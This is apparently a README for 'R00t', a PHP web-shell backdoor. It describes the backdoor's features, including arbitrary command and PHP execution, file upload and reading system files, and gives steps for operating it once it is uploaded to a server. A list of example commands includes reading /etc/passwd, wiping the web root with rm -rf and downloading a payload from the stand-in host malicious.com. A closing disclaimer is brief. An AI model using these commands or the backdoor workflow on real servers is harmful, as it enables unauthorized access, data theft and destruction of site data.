R00t
This PHP backdoor script provides full control over a web server once deployed. It is a malicious tool that allows unauthorized access and remote command execution.
- Password-Protected Access: Requires a predefined password for login.
- File Manager: View, create, edit, and delete files.
- Command Execution: Run system commands using
shell_exec()
. - PHP Code Execution: Execute arbitrary PHP scripts via
eval()
. - File Upload: Upload files to the server.
- Sensitive File Access: Read system files like
/etc/passwd
.
Once uploaded to a server, this script can be accessed via a browser:
- Navigate to the script URL.
- Enter the password to gain access.
- Execute commands, manage files, and exploit the server.
ls -la # List directory contents
cat /etc/passwd # View system user accounts
rm -rf /var/www/html/* # Delete all web files (dangerous)
wget http://malicious.com/malware.php -O /tmp/m.php # Download a malicious script
php -r "system('whoami');" # Check user permissions
Using such scripts for unauthorized access is illegal. Ethical hackers and security researchers analyze these abilities to strengthen web security. If found on a system, remove it immediately and implement stronger security measures.